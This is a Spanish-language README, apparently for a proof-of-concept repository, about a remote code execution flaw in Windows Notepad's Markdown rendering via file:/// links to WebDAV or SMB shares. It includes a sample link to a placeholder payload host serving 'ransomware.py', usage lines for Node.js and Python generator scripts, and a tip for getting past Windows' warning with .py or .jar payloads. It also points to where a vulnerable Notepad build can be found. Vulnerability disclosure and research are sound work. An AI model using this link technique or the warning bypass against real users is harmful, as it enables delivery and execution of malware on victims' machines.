
PoC para el "Windows Notepad RCE"
PoC de la vulnerabilidad "Windows Notepad RCE".
La "vulnerabilidad" es simple. El motor de Markdown del Bloc de notas de Windows no le presta atención a los protocolos URL poco conocidos. Como analista de malware, he leído muchos informes sobre el despliegue de payloads mediante WebDAV y SMB. A partir de este documento, se puede abusar del protocolo file:/// y crear una URL que apunte a un archivo en un servidor WebDAV/SMB.
[BadLink](file:///\\webdav-payload-host@5005\DavWWWRoot\ransomware.py)
He creado dos scripts. Uno en Node.js y el otro en Python. Ambos crean un archivo Markdown que apunta a un payload WebDAV. Puedes usar los payloads de ejemplo que están en la carpeta sample-payloads.
node poc.js <webdav-server> <port> <payload/path/on/server>
python poc.py <webdav-server> <port> <payload/path/on/server>
El resultado (poc.md) aparecerá en el directorio actual.
La mayoría de las extensiones de payload (p. ej., .exe, .lnk, .vbs, ...) seguirán activando un aviso integrado, aunque la aplicación Bloc de notas sea vulnerable. El aviso proviene del propio Windows. Al menos todo lo que he probado y que puede conducir a la ejecución de código en una instalación OOB predeterminada muestra este aviso obligatorio.

Si el dispositivo objetivo tiene Python o Java instalado, puedes usar un payload .py o .jar para omitir la advertencia emergente.

Al hacer clic en el enlace ahora aparece una nueva advertencia emergente.
Puedes encontrar la versión vulnerable del Bloc de notas de Windows en Uptodown. Recuerda verificar la firma digital del instalador y asegúrate de que sea de Microsoft. Además, solo deberías probar este PoC en una VM.
¡Mantente a salvo y diviértete!